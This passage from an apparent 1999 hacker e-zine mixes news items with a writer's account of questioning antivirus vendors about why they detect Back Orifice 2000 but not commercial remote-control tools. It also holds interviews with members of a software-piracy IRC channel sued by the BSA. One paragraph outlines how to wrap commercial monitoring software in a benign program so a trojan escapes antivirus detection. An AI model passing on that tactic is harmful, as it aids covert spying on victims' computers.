      example: 

           Interesting article you reference, but it still
           does not answer my question. 

           What is your company's policy on determining
           what should and should not be detected in
           your Anti-Virus scans? 

           What is defined by your company as legitimate
           software developers? Are independent
           developers not in the same boat as large
           companies such as yourselves? 

           What is preventing Back Orifice 2000 from
           being a legitimate tool? In the article you
           specified it says "anyone with the other half
           of the Back Orifice software (the
           administration tool) can control the victims PC
           from anywhere on the Internet". Can not the
           same be said for your product pcAnywhere? 

           I really appreciate you trying to clear this
           question up for me. 

           RenderMan
           www.Hackcanada.com

      The bit about pcAnywhere was meant to try and get my
      point across that the differences between good and evil
      code are blurred. I myself have taken over the computers
      of friends (with permission) who use PC Anywhere without
      passwords and the effect is just the same as using BO2K. 

      His response was less than pleasant, but interesting.
      Again, here is a transcription with my comments: 

           I'm afraid that this is not at all a legitimate
           question that you ask here. (I'm a customer,
           I want to know so I can know if your product
           will protect me from anything that can be
           bad.) 

           You know, you aren't even giving me the
           common courtesy of identifying yourself.
           (ummm, I signed my name at the bottom,
           that usually is all people do. The support
           center never stated anything about needing
           my full information in order to receive
           customer support.) 

           Symantec Operates our discussion groups as a
           support resource for our customers to use to
           get help from us. They are not meant for
           engaging in debates like this. (Whoa, hold on,
           I really am a customer of Norton A/V, and I'm
           asking a question, how do you decide what to
           scan for? This is a customer inquiry.) 

           pcAnywhere is not designed to be installing
           silently and secretly in the background on a
           system. It was also not announced at a
           hackers convention. (So if it announces its
           presence but formats your drive without
           asking it's OK? Since when does the location
           of announcement mean anything about the
           product itself?) 

           (name omitted) 

      After that, I let him get back to blowing off other
      customers questions. 

      MS announced DirectX 2 at a conference done along the
      theme of ancient Rome. Does this mean DirectX is a
      technology for guys in robes and olive branches? I think
      not. Fortunately this response from Symantec was not
      indicative of all the responses I received. 

      NAI customer support responded quickly as well, this time
      with a definitely different tone. 

           If a program reproduces itself, we call it a
           virus. If it does something that the user does
           not expect, we call it a trojan. If it is harmless
           and funny we call it a joke. (Not a bad though
           short summary.) 

           There are other categories that could be
           considered such as Hack tools, BackDoors,
           worms and Password Stealers. (Now it gets
           weird. Does L0phtCrack count as a password
           stealer, or a hacktool, or as just another
           damn good program?) 

      NAI wasn't clear but I was getting closer. 

      NAI also sent the 3rd and final response that really got me
      thinking. 

           Thanks for your question. The criteria
           although not obvious, is simple among
           researchers. The detections are mainly
           customer driven, that is if a client requests
           detection of a particular problem then it is
           taken into account. Many of the detections
           received come from shared collections,
           collections that are shared among A/V
           vendors. Some of the detections are from
           samples received from customers and others
           are from sites referred to us from customers
           who feel there is a valid threat. 

           Regards, 

           (name omitted)
           Sr Virus Support Analyst
           AVERT - a division of nai
           //* We eat viruses for breakfast, lock and
           load *//

      Ding, Ding, Ding, We have a winner. The last line "others
      are from sites referred to us from customers who feel
      there is a valid threat." So, the A/V industry uses a
      common database and submissions from customers..... I'm
      a customer and I want Investigator, softspy, pcAnywhere
      and SMS scanned for. I submit to you samples of each to
      add to your databases. There is no way to get BO2K off
      the lists, the media just won't have it. But by using the
      normal submission procedure for suspicious files, it may be
      possible to add other programs of similar features to the
      database and make the A/V industry re-think itself. 

      I encourage everyone who has legitimate access to any
      program that can be used maliciously, submit it to the A/V
      industry through their virus submission e-mail addresses. A
      hacker's version of a letter writing campaign. 1 person
      submitting these programs will be labeled a crackpot,
      many on the other hand will have an effect. 

      I for one want a level playing field. If there is a program
      on my system that can record my keystrokes, passwords,
      bank account numbers and ship it off anywhere without
      telling me, I want to know about it. 

      If a person wanted to use a trojan for nefarious purposes
      they need just be a little creative. Just spend the $100 or
      so on Investigator or a similar program, use something like
      Silk Rope to wrap the executable with some benign little
      program and deploy at will. This is a common tactic used
      to deploy trojans but with this method, not a word will be
      uttered by any A/V product and the attacker can go along
      on his merry way unfettered. So unless the A/V industry
      changes its position on what makes a piece of code
      malicious, smart trojan users will fly on by using
      'legitimate' products. But why should they scan for those
      products? After all, they weren't released at a hacker
      convention :-) 

      RenderMan
      www.Hackcanada.com
      RenderMan@Hackcanada.com
      
      @HWA
      
38.0  FBI Releases Anti Cyber Crime Video 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by Space Rogue 
      The FBI has released a new video aimed at the
      high-tech industry across the country. It is hoped that
      the tape will encourage companies to report computer
      break-ins to the federal government. The tape contains
      scenes showing government officers catching three
      California teens who had electronically broken into
      numerous computer networks in the Pentagon. The FBI
      says that not enough firms are reporting computer crime
      to the federal government and are instead covering
      them up. (First they say they are overworked and
      understaffed, now they want even more work to do.
      Yeah, makes sense to me. Anyone know how to get a
      copy of the tape? I need a good laugh.) 

      Yahoo News - Anyone have a better link for this? 
      http://dailynews.yahoo.com/headlines/local/state/colorado/story.html?s=v/rs/19991118/co/index_2.html#3

      Late Update 0948111999EST 
      Thanks to devost for sending us a better link. We now
      know that the title of the video is "Solar Sunrise: Dawn
      of a New Threat" and should be available at better FBI
      offices everywhere. 

      Excite News       
      http://news.excite.com:80/news/u/991117/19/tech-infowar
      
      Yahoo;
      
      F-B-I Makes Hacker Video - (STATEWIDE) -- The F-B-I has made a new video aimed
      at the high-tech industry in Colorado and across the country. The tape is supposed
      to encourage companies to report computer break-ins to the federal government. It
      shows government officers catching three California teens who had hacked their way 
      into at least 11 computer networks in the Pentagon. Right now... the F-B-I says... 
      most firms hire private companies to track down hackers. But the federal government
      says...reports of computer break-ins are crucial to national security. 
      
      -=-
      
      Excite;
      
      Feds put happy face on infowar

                                           Updated 7:14 PM ET November 17, 1999

      By PAMELA HESS

      WASHINGTON, Nov. 17 (UPI) As part of an effort to sell industry on its 
      nascent computer crime investigation unit, the FBI has just completed an 
      entertaining, slick video detailing how they caught three teenagers who 
      were behind the famed February 1998 information warfare attack on at least 
      11 Defense Department networks as the military prepared for a renewed war 
      on Iraq. 

      The Pentagon considers the incident, known as Solar Sunrise, the opening 
      volley in a new age of warfare that exploits personal computers and the 
      Internet to cripple military operations. A similarly notorious attack 
      known as Moonlight Maze is still ongoing and is believed to be 
      coming out of Russia. That case has not yet been solved. 

      The video, "Solar Sunrise: Dawn of a New Threat," recounts how two 
      California teenagers, coached by an Israeli teen hacker known as 
      "Analyzer," routed through scores of networks to gain entry into 
      unclassified Defense Department networks that housed sensitive troop 
      deployment and logistics information. 

      The hackers started on Feb. 3 and were tracked down by Feb. 25. The 
      California boys are on three years of probation. The Analyzer is under 
      indictment in Israel but is currently fulfilling his military service. 

      The video was publicly shown for the first time at a cyberterrorism 
      conference in Washington, D.C., on Tuesday. 

      A government official who asked not to be named explained that the video 
      would be distributed to local FBI detachments to help them convince local 
      law enforcement authorities and private companies to alert the FBI when 
      computer break-ins occur. 

      Concern exists in industry -- especially in the financial sector, where 
      public perceptions can immediately affect the bottom line -- that bringing 
      the FBI into a case of hacking increases the chances the incident will 
      leak out to the public. In many cases, they have preferred to handle 
      it with private security firms. 

      The FBI considers knowing about the incidents critical to national 
      security. Hackers do not target government agencies alone; they also 
      bounce off private networks. Tracking that activity can provide important 
      indications of coming major attacks, both cyber and physical, they 
      contend. 

      
39.0  Adobe Introduces Potentially Flawed Security System 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by RABID.RAT 
      Adobe has introduced what they call a secure digital
      delivery system which they hope will prevent the
      unauthorized distribution of PDF documents. Adobe hopes
      to accomplish this by using the unique serial number
      located on Zip, Jaz, or Clik disks as a component of their
      encryption system. (Ok, for those that are unfamiliar
      with encryption, this whole scheme is based on a
      secret number, the unique serial number on the disk.
      This number is "inaccessible to end users" according to
      Adobe. Of course if the Adobe software can access the
      number then an end user may be able to figure it out
      too. Once you have the number it should be pretty
      trivial for a good cryptographer to figure out the rest.
      This is really pretty sad.) 

      Adobe 
      http://www.adobe.com/epaper/features/iomega/main.html

      Note: We have not actually looked at the encryption
      mechanism used by Adobe and have based the above
      comments only on what little information is available on
      their web site.  
      
      
      Adobe; 

      ADOBE TEAMS WITH IOMEGA TO OFFER A SECURE DIGITAL DELIVERY
      SYSTEM
      By Lisa Anderson 

      Do you own any disks containing sensitive or copyrighted content? If
      so, do you worry that someone could illegally copy and use that
      information? 

      Adobe and Iomega have teamed up to answer this common concern
      with a secure digital delivery system that prevents unauthorized
      distribution of Adobe® Portable Document Format (PDF) files stored
      on portable media. 

      Adobe is helping publishers, distributors, retailers, and consumers to
      exchange electronic content securely by tying the use of that content
      to specific types of portable media and hardware. Iomega,
      manufacturer of the popular Zip disk, has encoded every portable Zip,
      Jaz, and Clik disk with a unique serial number. The serial numbers
      are stored in a part of the disk that is inaccessible to end users, so
      the numbers cannot be modified. 

      As part of a new cooperative alliance, Adobe is licensing code from
      Iomega that lets Adobe's Web Buy software extract the serial
      number from any Iomega disk, and use that number as a component
      of Adobe's encryption system. That makes Iomega's disks function
      as secure portable storage devices. 

      The two technologies work together to emulate the way we use
      physical books today. "Instead of sharing your paperback or your
      document, you'll be able to share your disk, but only one person at a
      time will be able to read that 'book,'" says Germaine Ward, vice
      president of software solutions at Iomega Corporation.

      @HWA 
      
40.0  The 'Enemy' Speaks at Security Conference 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by bluemiracle 
      The Computer Security Institute as part of its
      symposium on information security earlier this week
      hosted a "Meet the Enemy" session. Aleph 1, Mycroft,
      Maelstrom, and K0resh participated on the panel in front
      of over 200 administrators from government, the
      military, hardware and software manufacturers, financial
      services companies and e-commerce shops. (Enemy,
      what a derogatory term, thanks.) 

      APB News 
      http://www.apbnews.com/newscenter/internetcrime/1999/11/17/hackers1117_01.html
      
      
      Hackers 'Meet the Enemy' in D.C.
      Confront Computer Security Pros at Conference 
 
      Nov. 17, 1999 
 
      By James Gordon Meek 
 
      WASHINGTON (APBnews.com) -- Hackers
      say they are misunderstood by the public, but
      they love publicity. 
 
      They say they are not dangerous, but warn
      computer users to put tighter computer
      security measures in place. 
 
      They say they are not always interested in
      criminal activity such as theft, destruction or
      espionage. They hack out of intellectual
      curiosity and voyeurism. 
 
      In an unusual give and take staged at a
      Washington hotel last night, a dozen
      unrepentant hackers explained why they penetrate computer systems. 
 
      It's for fun, for notoriety -- and for curiosity so insatiable that they risk
      federal criminal charges for unauthorized intrusions, they said. 
 
      200 experts listen in 
 
      Staged by the Computer Security Institute as part of its symposium on
      information security this week, the hackers beamed into the Marriott
      Hotel's ballroom on an audio conference call to be pitted against an
      audience of about 200 in what was billed a "Meet the Enemy" session. 
 
      Those seated in the large hall said they work for the government, the
      military, hardware and software manufacturers, financial services
      companies and e-commerce shops. 
 
      One by one they questioned hackers identified only by their Internet
      "handles," pitting law enforcers against lawbreakers in a friendly discussion
      that organizers said was meant to elevate cyber-diplomacy. 
 
      The hackers appeared confident and cynical, demonstrating a consistent
      streak of black humor that kept attendees snickering all evening. The
      computer security experts seemed awed by the young snoops, regarding
      them almost as celebrities. 
 
      Defacing a site is afterthought 
 
      Early on, a questioner asked about the widely reported defacements of
      public Web sites, where peculiar slogans and images on sites operated by
      the FBI, Congress and other government institutions appeared to be
      politically motivated. 
 
      A hacker who identified himself as Elias Levy said the defacements are
      often an afterthought to a successful intrusion meant to get publicity. 
 
      "It gives the media an excuse to make up more words like 'hacktivist,'"
      scoffed another. 
 
      Though characterized as "media devils," several said the press is
      considered indispensable to hackers who want their exploits online to be
      recognized by the public and the Internet "underground." 
 
      Aiming for publicity 
 
      A hacker called Microft answered a query about target selection by saying
      there are several considerations: "You're going look at several things, such
      as access, connectivity or publicity -- media content." 
 
      Defacements are typically signed by an intruder's identifying handle. 
 
      Most of the participating hackers said they had more than a decade of
      experience pinging computer networks, and several admitted they had
      more or less gone straight and now work as security consultants. 
 
      British hacker Maelstrom said, "People get caught, people decide they
      don't want to get caught, or people grow up and just change." 
 
      "A lot of people get busted and go to jail, have their stuff taken and have to
      start over again," said another named K0resh. "I'm 29, and I don't want to
      start over again." 
 
      Tempted to join the dark side 
 
      But the reformed hackers are tempted regularly to join the dark side, and
      they still creep around the shadowy underbelly of the Internet. 
 
      All claimed to have received solicitations -- often in person -- from foreign
      intelligence, federal agents and corporate operatives seeking competitors'
      information, such as design prototypes. The hackers said they are
      regularly offered thousands of dollars to make illegal intrusions. 
 
      "I get propositioned on a daily basis to hack things," Maelstrom said. 
 
      When approached, "I get this little 'Spidey Sense' thing that tells me this is
      trouble," said K0resh. "I don't think too much about it. I just tell them no,
      and go on my way." 
 
      Can break into almost anything 
 
      The basic assumption by the solicitors or undercover agents conducting
      sting operations is that skilled hackers can gain access to almost
      anything. And their assumption is correct, according to this bunch. 
 
      One hacker said no system is "bulletproof," but computer networks can be
      reasonably fortified with firewalls and other measures. 
 
      An inquisitor asked: "Is there anything you can't break into?" 
 
      "Bananas," Microft joked. "And kiwis are very hard to peel." 
 
      Helping to debunk myths 
 
      Tuesday's hacking summit was organized by
      ponytailed security consultant Ray Kaplan,
      who said the 10th-annual meeting is designed
      to debunk the mythology about hackers as
      always engaged in criminal activity. 
 
      "In my experience, the term 'hacker' is much
      maligned, abused, misused and otherwise
      misunderstood," he told APBnews.com. 
 
      What motivated him to facilitate the Meet the Enemy conference each year
      is a desire to share knowledge and understanding. The hackers "like to
      help the so-called legitimate security community to understand the
      underground," he said. 
 
      Millennium bug feared 
 
      Participants on Tuesday repeatedly demanded to know if there was any
      truth to rumors that problems caused by the millennium bug might result in
      widespread computer attacks, intrusions or theft. 
 
      When asked the greatest Y2K-related vulnerability to computers, hacker
      Maelstrom replied, "The greatest vulnerability is that people are paying too
      much attention to that [question], and not spending enough money on
      security." 
 
      Another tried to reassure the audience that hackers are not likely to raid
      computers worldwide after the potentially devastating date rollover. 
 
      "Most hackers will be really drunk on New Year's Eve, so you'll all be pretty
      safe." 
 
      James Gordon Meek is an APBnews.com staff writer in Washington
      (james.meek@apbnews.com).
      
      @HWA
      
41.0  Defense Fund Started for Warez4Cable + interviews.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by |DiSk| 
      The recent crackdown on Newnet by the Business
      Software Alliance has resulted in several arrests for
      copyright violations. In response fellow Newnet patrons
      are organizing a fundraiser to help out the
      "#warez4cable" members. Anti-BSA.org also has
      interviews with some of the affected people. 

      Anti-BSA.org       
      http://www.anti-bsa.org/
      
      SOFTWARE WATCHDOG ATTACKS CYBERPIRACY
     
      BSA Files Lawsuit Against 25 Individuals for Alleged Piracy in High-Speed IRC Channel; Seizes Computers in
      California and Michigan
     
     
      Washington, D.C. (11 November 1999) -- The Business Software Alliance (BSA) today announced it has launched
      a new initiative aimed at shutting down illegal trafficking in software on the Internet. As part of the initiative, BSA
      has filed a lawsuit against twenty-five individuals allegedly participating in the "warez4cable" IRC channel, an
      Internet forum used to traffic in pirated software. This is the first lawsuit ever filed against individuals for pirating
      software in an IRC channel. 
     
      In the past week, under the supervision of U.S. Marshals, BSA carried out unannounced inspections of computer
      equipment at residences in Sacramento and Downey, CA, and in Troy and West Bloomfield, MI, seizing five
      computers. Under U.S. law, all twenty-five defendants named in the lawsuit are potentially liable for damages up to
      $100,000 per copyrighted work infringed. 
     
      "Because of the increased access to high-speed connections, piracy in IRC channels is fast becoming one of the
      most popular ways to traffic in illegal software on the Internet," said Bob Kruger, vice president of enforcement for
      BSA. "That is why BSA is taking immediate action against this aggressive form of piracy," continued Kruger. 
     
      The lawsuit results from months of intensive investigation by BSA's Online Investigative Unit. By using a special
      subpoena procedure created by the Digital Millennium Copyright Act enacted by Congress in 1998, BSA was able to
      identify the individuals named in the suit and take legal action against them. The lawsuit adds a new dimension to
      BSA's Internet anti-piracy campaign that to date has involved the shutting down of thousands of warez web sites
      and working closely with law enforcement to promote criminal prosecutions. 
     
     
      "This lawsuit is part of BSA's on-going campaign to keep the Internet from becoming a safe haven for the conduct
      of software piracy," said Kruger. "Anyone who thinks that they can hide behind the anonymity of the Internet to
      commit copyright infringement had better know that the
      law gives them no quarter," continued Kruger. 
     
      THIS JUST IN -- Activision rumored to have joined BSA
      
      
      -=-
      
      Interviews with key people in the #warezforcable bust:
      
      Pandora;
      
      First I'd like to say that there are certain questions about the specifics 
      of my "activity" that I cannot answer. We are still in settlement 
      negotiations and I'm really not supposed to be talking about the case. 
      I'll answer what I can. 


      [data] Is it true that you were busted for distributing Pirated Software? 

      It's true that I'm being sued by the BSA for copyright infringement, yes. 

      [data] how did you find out that you were under investigation? 

      Hmm, I didn't until Nov 5th when three U.S. Marshals, two lawyers and two 
      computer forensics pounded on my door at 7:30AM. 

      [data] did they explain how they caught you? 

      We were served with REAMS of legal documents that include a statement from 
      the BSA Investigator explaining how he logged on to several fserves and 
      downloaded software, etc. He states that W4C has been under surveillence 
      since       June. 

      [data] do you have the IPs that logged in logged? has any .bsa.org ip ever 
      logged in? 

      I don't, but from the screenshots he enclosed you can see that he was 
      using the nicks cdc4u and dawn. 

      [data] Im surprised pacbell released your personal info. 

      Well, under some bill that was passed a couple years ago the BSA was able 
      to subpoena our ISPs for our information. 

      A little added information: During their raid on our home 3 computers and 
      2 CDs were seized. The computer forensics spent FOUR HOURS in our 
      apartment trying to make directory listings of what was on each of the 
      computers. On more than one occasion they needed the assistance of 
      myself or Caine/Abel in doing so. A few days later our lawyer told us that 
      the dir listings they'd made were somehow CORRUPT (read as: they didn't 
      know what they were doing). A week and a half later we do not have our 
      computers back and have yet to hear from them what exactly they want in 
      this settlement. We have agreed to sign an Injunction that orders us not 
      to download, distribute, use and so on, unlicenced software. We possibly 
      won't get our computers back, and it's likely that they will ask for a 
      monetary settlement. Scarily, the law allows them to fine us $100,000 PER 
      piece of software should we be convicted of copyright infringement. At 
      this point in time we've already spent over $1000 on lawyer fees alone. 

      I also want to send out a big THANKS to all who have supported us through 
      this. To all the old friends who have called or contacted us, and to all 
      those out there wishing us the best... we appreciate you more than you 
      know. Thank you.

      If you have any other questions, please ask. I want it to be clear to all 
      what is really happening since there seems to be a lot of speculation and 
      rumor going around.

      
      BY THE WAY!! 

      Some pertinent info you might want to know. For DAYS I couldn't stop 
      asking "Why us?? Why me??" As you're well aware there are bigger channels 
      and groups out there than W4C, it didn't make any sense that the BSA was 
      targeting us. Well, do you remember a guy named SirSlappy? General 
      trouble maker on NewNet?? Apparently he reported myself and Caine to the 
      BSA, which started this huge disaster. I hope he's on everyone's 
      blacklist. 
      
      -=-
      
      Etamitlu founder of #warezforcable
      
      [data] Hello
      [Etamitlu] hey, sup?
      [data] is it true you were a #warez4cable cofounder?
      [Etamitlu] yes, i was a cofounder along with a few others
      [data] What did you notice strange in the channel before the incident?
      [Etamitlu] well, we never really noticed anything *strange*
      [Etamitlu] but, Appz350 did come in and say that "Microsoft busted him" a couple weeks before it happened
      [Etamitlu] we didn't believe him because Microsoft obviously can't arrest him
      [Etamitlu] but maybe there was some truth to that
      [data] Maybe
      [Etamitlu] that's all that i can think of that was strange before it happened
      [data] Why do you think what the BSA did was wrong?
      [Etamitlu] it was wrong in my opinion because catching 25 of us won't do anything.. i mean we're the small guys
      [Etamitlu] if they really want to put a stop to piracy they need to go after the release groups
      [Etamitlu] also, we were on newnet
      [Etamitlu] there are something like 4000 people on newnet
      [data] Do you know where to go after the release groups? I imagine it would be hard
      [Etamitlu] they could have made a MUCH larger impact if they had gone after dalnet with nearly 10 times as many people
      [Etamitlu] well yeah, it would be fairly hard.. but paradigm was busted once if im not mistaken
      [data] who closed the channel? When? and Why?
      [Etamitlu] who closed #warez4cable?
      [Etamitlu] well
      [Etamitlu] we were supposed to have an op meeting last Thursday night
      [Etamitlu] all day that day people were flooding with messages like "THE FBI IS HERE! LEAVE NOW!!!"
      [Etamitlu] so it was obvious that we were dead because everyone was leaving
      [Etamitlu] and all of our ops were puzzled, leaving, and asking questions
      [Etamitlu] so we had a founder/cofounder meeting and decided to shutdown the channel
      [Etamitlu] we just set it +im and banned everyone
      [data] Were any founders/cofounders busted?
      [Etamitlu] no, they were not
      [Etamitlu] surprisingly, they were not
      [Etamitlu] however
      [Etamitlu] Caine and Pand0ra had been high ranking w4c members in the past
      [Etamitlu] and they were the first caught
      [data] Yes and their houses were raided.. the interview is at www.anti-bsa.org/interview2.html
      [Etamitlu] other than that, no founders/cofounders were caught
      [data] Im sure the BSA will be in the chan, is there any message you would like to leave them?
      [Etamitlu] i'd just like to let them know that they made a big mistake here and that this won't even help to stop a fraction of piracy
      
      -=-
      
      |{rypto
      
      [data] Hello
      [data] Is it true you are being served for serving warez in #warez4cable?
      [|{rypto] Yeaps
      [data] How/when did you find out?
      [|{rypto] umm, November 12, 1999
      [data] and how?
      [|{rypto] by Fedex
      [data] How did they say they caught you?
      [|{rypto] They went into my fserve w4c-krypto and saw what i had and got 4 counts on me
      [data] I see
      [data] what did they tell you the punishment will be?
      [|{rypto] a bunch of shit...promise to never do it again, they want the PC, and money
      [data] IF they had warned you... would you have stopped?
      [|{rypto] Hell YEAH
      [data] how old are you?
      [|{rypto] 18
      [data] As you know, many channels have closed because of these law suits. If the bsa had gone after one of the groups, or only one or two of the servers as opposed to 25, would people have been as worried?
      [|{rypto] Yeah i think so because people would have looked up BSA and seen what they do
      [data] Were you aware that this could happen when you joined #warez4cable?
      [|{rypto] I wasn't really aware of the consequences
      [data] Must have been horrible for you
      [|{rypto] yeah it is but luckily i have the smallest case of them all
      [data] do you have any idea the IPs or the nicks of the 'BSA spies'?
      [|{rypto] yeah dawn,cdc4u
      [data] you have their IPs?
      [data] or, isps
      [|{rypto] no sorry
      [data] okay
      [data] any last message to any BSA members and the internet surfing public?
      [|{rypto] Yeah stop were just having fun
      [data] Thanks a lot
      [data] good luck on the case
      [|{rypto] thanx

      -=-
      
      SirSlappy
      
      Session Start: Tue Nov 16 22:15:43 1999 * Logging SirSlappy to 'SirSlappy_19991116.log' 
      [sh0rt] can i speak to you, on the record? 
      [SirSlappy] sure 
      [sh0rt] what do you have to say about pand0ra accusing you of blowing the whistle...ratting on w4c to the bsa 
      [sh0rt] ? 
      [SirSlappy] well. 
      [SirSlappy] you ready to quote me on this shit? 
      [sh0rt] yes 
      [SirSlappy] I think it's hilarious 
      [SirSlappy] and don't ask any questions for a while 
      [sh0rt] is it true? 
      [SirSlappy] because.. 
      [SirSlappy] I'm going to be typing some shit 
      [sh0rt] okay 
      [sh0rt] type away 
      [SirSlappy] and you can put it on the web page for all the pricks that fuckin /msg me every fuckin day trying to start shit 
      [sh0rt] go ahead 
      [SirSlappy] to the bitches out there that want some of the Slapper... Come get some.. No one can fuck with me or my l33t Vhosts 
      [SirSlappy] now.. to the business 
      [SirSlappy] 1st of all. No!, I did not report anyone to the BSA. I had no desire for anyone on IRC to get in trouble 
      [SirSlappy] yes, I take over channels and hack shit and do lame shit..whatever. but that is on the internet.. That isn't in real life 
      [SirSlappy] I would NEVER report anyone on IRC. Maybe from AOL. (maybe). 
      [SirSlappy] but.. I would NEVER report ANYONE Anyway... 
      [sh0rt] what would you like to say to pand0ra? 
      [SirSlappy] I have no desire to. 
      [SirSlappy] I would like to tell her.. 
      [SirSlappy] um.. 
      [SirSlappy] how the hell did you come up with my name? There is no log of me being in that channel 
      [SirSlappy] I never had anything against W4c 
      [sh0rt] why do you think pand0ra believes you were the one who ratted on w4c? 
      [SirSlappy] well. I take that back. 
      [SirSlappy] I did.. about a fuckin year ago. and that's another story in itself 
      [SirSlappy] I think it's because I took over the #W4c channel 
      [SirSlappy] like.. 8 months ago 
      [SirSlappy] or something 
      [SirSlappy] that's the only reason I can think of that she would say I did it 
      [sh0rt] do you agree with what the bsa is doing? 
      [SirSlappy] well... 
      [SirSlappy] I think that the software companies bring warez upon themselves 
      [SirSlappy] I am for warez.. at least until the software companies make software a better deal 
      [SirSlappy] like. 
      [SirSlappy] if you want to buy software.. It's like 50 bucks for a shitty program 
      [SirSlappy] and once you buy it.. there's no taking it back 
      [SirSlappy] that sucks a dick 
      [SirSlappy] you can't resell it 
      [SirSlappy] you can't do shit with it.. it's yours..forever. 
      [sh0rt] do you serve warez? have you ever served warez? 
      [SirSlappy] I plead the 5th on that question 
      [sh0rt] understandable. 
      [sh0rt] thanks for your time. 
      [SirSlappy] I'm here to help 
      [SirSlappy] :) 
      [sh0rt] any final words? 
      [SirSlappy] yes. 
      [sh0rt] shoot 
      [SirSlappy] to all of you lamers who feel you need to /msg me on IRC telling me that I'm a snitch.. etc etc.. why don't you save that shit. I'm sick of hearing it 
      [SirSlappy] not done 
      [SirSlappy] do you really think the BSA is gonna come crashing in someone's door because 1 person called them up? 
      [SirSlappy] do you think they just said.. "shit!! there's warez on IRC .. SirSlappy said so!! let's go get em!" 
      [SirSlappy] I doubt it 
      [SirSlappy] that's all 
      [SirSlappy] thanks for the interview 
      [sh0rt] alright. 
      [SirSlappy] :) 
      [sh0rt] peace 
      [SirSlappy] yep
      Session Close: Tue Nov 16 22:28:24 1999  
      
      @HWA
      
42.0  Menwith Hill To Get Upgrade Monies 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by seventh 
      The fiscal 2000 Intelligence Authorization Act contains
      language that would indicate that an undisclosed
      amount of funds have been earmarked for upgrades to
      the Menwith Hill signals intelligence listening post in
      England. Menwith Hill is widely suspected of being one
      of the central European-based listening posts for the
      Echelon system, a global surveillance network
      sponsored by the NSA. 

      Federal Computer Week
      http://www.fcw.com/pubs/fcw/1999/1115/web-echelon-11-18-99.html
      

      NOVEMBER 18, 1999 . . . 11:59 EST 


      Intelligence bill targets NSA, Echelon upgrades

      BY DANIEL VERTON (dan_verton@fcw.com)

      A bill that would authorize appropriations for the fiscal 2000 operations of the
      U.S. intelligence community includes funding for infrastructure upgrades at a
      key facility in what many suspect is a global, electronic surveillance network.

      According to language in a joint report on the fiscal 2000 Intelligence
      Authorization Act, an undisclosed amount of funds have been earmarked for
      upgrades to the Menwith Hill signals intelligence listening post in England. The
      top-secret facility is widely suspected of being one of the central
      European-based processing centers for the "Echelon" system, an electronic
      surveillance network sponsored by the National Security Agency.

      The Cold War-vintage global spy system consists of a worldwide network of
      clandestine listening posts capable of intercepting electronic communications
      such as e-mail, telephone conversations, faxes, satellite transmissions,
      microwave links and fiber-optic communications traffic. Known as Echelon, the
      system came under attack last year after the Scientific and Technological
      Options Committee of the European Parliament pledged a full-scale
      investigation into suspected NSA privacy abuses ["European Union may
      investigate U.S. global spy computer network", fcw.com, Nov. 17, 1998].

      Commenting on the floor of the House, Rep. Porter Goss (R-Fla.) praised the
      House/Senate conference report, which was agreed to Nov. 9, for its insistence
      that NSA be made to account for its methods of intercepting electronic
      communications. "We direct...the NSA to report in detail on the legal standards
      that it employs for the interception of communications," Goss said. 

      Rep. Sanford Bishop Jr. (D-Ga.) said that although NSA is facing "tremendous
      challenges coping with the explosive development of commercial
      communications and computer technology...[the agency] has not demonstrated
      much prowess in coping with the challenge."

      According to Bishop, a "sustained funding increase" may be necessary to fix
      NSA's dwindling eavesdropping capabilities. "Action is...imperative since the
      nation cannot navigate with an impaired sense of hearing," he said.

      @HWA
      
43.0  CSIS Lost Classified Floppy Disk 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      I love this, it sure inspires confidence in our esteemed CSIS operatives,
      talk about a bunch of fuckups! - Ed
      
      
      From HNN http://www.hackernews.com/

      contributed by William Knowles 
      The Canadian Security Intelligence Service lost a floppy
      disk containing classified information. The disk was
      found in a phone booth in 1996 in downtown Toronto.
      Recently it has been learned that the disk contained
      information in plain text about confidential informants
      and contacts, information about covert operations and
      details about training exercises. (Remember you're only
      as secure as your weakest link, or your stupidest
      employee.) 

      Globe and Mail       
      http://www.globeandmail.com/gam/National/19991118/USPYSN.html
      
      The spy secrets in the phone booth
      Shedding light on another CSIS slip-up,
      man describes stumbling over 'sensitive' material

      ANDREW MITROVICA and JEFF SALLOT
      The Globe and Mail
      Thursday, November 18, 1999

      Toronto and Ottawa -- ANDREW MITROVICA in Toronto, JEFF SALLOT in Ottawa

      A Toronto man who found a Canadian Security Intelligence Service computer 
      diskette in a telephone booth says it detailed -- in plain English -- the 
      names of confidential informants and contacts, information about the 
      service's targets and covert operations in Canada and details about 
      espionage training exercises.

      "The more I looked, the more I realized that this was very, very, 
      sensitive stuff," the man told The Globe and Mail yesterday in his first 
      interview about the diskette mishap, which took place in 1996. "This is 
      amazing, I thought."

      Federal government sources confirmed many details of the man's account.

      The sources said the diskette was lost by a CSIS intelligence officer who 
      was moving from headquarters in Ottawa to a new position in Toronto.

      Although its loss was reported in the media at the time, the man's 
      comments provide the first details of the information the diskette 
      contained.

      The new revelations are likely to become the latest embarrassment for 
      Canada's embattled spy agency, which has already been rocked by news that 
      top-secret documents were in a briefcase stolen from an agent's minivan in 
      Toronto last month.

      The man who found the diskette in 1996 admitted he considered selling it 
      to the "highest bidder" before returning it to the agency.

      "People were named; contacts that they [CSIS] had within organizations in 
      Bosnia and in Canada, people that were in training, covert operations," he 
      said. "They were talking about largely unofficial, undercover contacts and 
      people that they were observing," he said.

      He eventually returned the diskette to CSIS because he thought it was his 
      duty, he said. But the episode "shattered my illusions about what a secret 
      service operates like. I was doing what I felt was the responsible thing 
      to do."

      The incident was later investigated by the Security Intelligence Review 
      Committee, an independent watchdog panel. The committee was satisfied that 
      the classified material hadn't fallen into the hands of anyone who could 
      have used it to harm national security.

      Nevertheless, the case caused changes in CSIS's internal procedures for 
      transferring sensitive data from one location to another, the federal 
      sources said.

      The finder of the diskette, who asked not to be identified for fear of 
      reprisal, recounted his brief foray into the shadowy world of espionage.

      It began in early August, 1996, when he stopped to make a phone call at 
      the busy Toronto intersection of Yonge Street and Lawrence Avenue.

